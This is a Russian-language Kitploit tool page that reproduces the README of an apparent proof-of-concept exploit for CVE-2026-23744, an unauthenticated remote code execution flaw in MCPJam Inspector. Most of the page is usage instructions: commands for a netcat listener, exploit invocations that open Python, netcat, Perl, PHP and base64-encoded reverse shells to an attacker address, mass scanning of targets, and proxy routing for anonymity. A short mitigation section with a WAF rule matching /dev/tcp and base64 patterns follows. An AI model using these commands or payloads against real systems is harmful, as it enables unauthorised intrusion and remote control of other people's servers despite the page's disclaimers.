Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-MCPJam-Exploit — PoC-эксплойт для CVE-2026-23744 — уязвимость удаленного выполнения кода (RCE) в MCPJam Inspector. Инструмент демонстрирует дефект безопасности в версиях <=1.4.2 и помогает исследователям безопасности проверять исправления. Только для авторизованного тестирования и образовательных целей. Включает несколько вариантов полезной нагрузки, выполнение команд и управление сеансами. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-23744-MCPJam-Exploit

Репозиторий
711 месяц назадЕщё не проверено

PoC-эксплойт для CVE-2026-23744 — уязвимость удаленного выполнения кода (RCE) в MCPJam Inspector. Инструмент демонстрирует дефект безопасности в версиях <=1.4.2 и помогает исследователям безопасности проверять исправления. Только для авторизованного тестирования и образовательных целей. Включает несколько вариантов полезной нагрузки, выполнение команд и управление сеансами.

Поделиться

CVE-2026-23744 MCPJam Inspector RCE Exploit

Security Research Python 3.7+ Version Author


⚠️ ПРЕДУПРЕЖДЕНИЕ

Этот инструмент предназначен ТОЛЬКО для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование незаконно. Пользователи несут полную ответственность за свои действия.


📋 Обзор

Этот репозиторий содержит доказательство концепции эксплуатации CVE-2026-23744 — уязвимости неаутентифицированного удаленного выполнения кода (RCE), обнаруженной в MCPJam Inspector версий <=1.4.2. Уязвимость имеет критический показатель CVSS 9.8, что указывает на высокую степень риска с сетевым вектором атаки.


📸 Скриншоты

ex

🚀 Возможности

Инструмент эксплуатации предлагает широкий набор функций, предназначенных для эффективного тестирования безопасности:

  • Поддержка нескольких полезных нагрузок: Включает полезные нагрузки Bash, Python, Netcat, Perl, PHP и Base64.
  • Выполнение команд: Выполнение команд на целевой системе с захватом вывода.
  • Сканирование целей: Сканирование нескольких целей с настраиваемым ограничением скорости.
  • Управление сессиями: Постоянное управление сессиями для текущего тестирования.
  • Поддержка прокси: Интеграция с прокси для анонимного или маршрутизированного трафика.
  • Снятие отпечатков цели: Идентификация характеристик целевой системы.
  • Автоматическая настройка слушателя: Автоматическая настройка слушателей для реверс-шеллов.

📦 Установка

Чтобы настроить инструмент эксплуатации, выполните следующие шаги:

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Установите зависимости:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Примеры использования

Базовая эксплуатация

Для запуска базовой эксплуатации сначала настройте слушатель, затем выполните скрипт эксплойта:

root@kitploit:~
# Запуск слушателя
nc -lvnp 4444

# Запуск эксплойта
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Выполнение команд

Выполнение отдельных команд или команд из файла:

root@kitploit:~
# Выполнение одной команды
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Выполнение команд из файла
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Различные полезные нагрузки

Используйте различные типы полезных нагрузок для разных сценариев:

root@kitploit:~
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Полезная нагрузка в кодировке Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Сканирование целей

Сканирование нескольких целей на уязвимость:

root@kitploit:~
# Создание файла с целями
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Сканирование уязвимых целей
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Расширенные опции

Изучите расширенные функции, такие как снятие отпечатков, использование прокси, подробный режим и автоматическая настройка слушателя:

root@kitploit:~
# С отпечатками
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# С прокси
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Подробный режим
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Авто-слушатель
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Типы полезных нагрузок


📊 Пример вывода

root@kitploit:~
[+] Запуск улучшенного эксплойта против http://192.168.1.100:8080
[+] Reverse shell на 10.0.0.5:4444
[*] ID сессии: AbCdEfGh
[*] Снятие отпечатков цели...
[+] ОС цели: Ubuntu
[+] Доступные возможности: python3, perl, nc
[*] Выполнение эксплойта...
[+] Эксплойт успешен!
[!] Проверьте ваш netcat слушатель на 10.0.0.5:4444

🛡️ Меры защиты

Немедленные действия

Для защиты от CVE-2026-23744 необходимо предпринять следующие немедленные действия:

  • Обновите MCPJam Inspector до версии >1.4.2.
  • Изолируйте уязвимые системы от сети.
  • Отслеживайте подозрительные запросы POST к /api/mcp/connect.
  • Внедрите правила брандмауэра веб-приложений (WAF) для блокировки вредоносных шаблонов.

Пример правила WAF

Пример правила Nginx WAF для блокировки распространенных вредоносных шаблонов:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ Часто задаваемые вопросы

Вопрос: Это легально в использовании?

Ответ: Этот инструмент легален только для использования на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.

Вопрос: Какие системы уязвимы?

Ответ: Уязвимы версии MCPJam Inspector <=1.4.2.

Вопрос: Как я могу защитить свои системы?

Ответ: Немедленно обновитесь до версии MCPJam Inspector >1.4.2.


📚 Ссылки

  • CVE-2026-23744 MITRE

👤 Автор

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Список изменений

Версия 2.0 (14 июля 2026 г.)

  • ✅ Исправлена надежность проверки слушателя
  • ✅ Реализован режим выполнения команд
  • ✅ Добавлено снятие отпечатков цели
  • ✅ Улучшено управление сессиями
  • ✅ Добавлены резервные варианты полезных нагрузок

Версия 1.0 (10 июля 2026 г.)

  • ✅ Первоначальный выпуск

⚠️ Финальное предупреждение

Несанкционированное использование этого инструмента незаконно и может привести к серьезным последствиям, включая:

  • Уголовное преследование
  • Гражданские иски
  • Постоянная судимость
  • Профессиональные санкции

Сделано с ❤️ от Sudeepa Wanigarathna

Скачать инструмент
АтрибутДетали
CVE IDCVE-2026-23744
УязвимостьНеаутентифицированное удаленное выполнение кода
Затронутые версии<=1.4.2
Оценка CVSS9.8 (Критическая)
Вектор атакиСеть
ТипКомандаЛучше всего подходит для
bashBash reverse shellБольшинство систем Linux
pythonPython3 reverse shellСистемы с установленным Python
ncNetcat reverse shellСистемы с netcat
perlPerl reverse shellСистемы с установленным Perl
phpPHP reverse shellСистемы с установленным PHP
base64Base64 encodedОбход обнаружения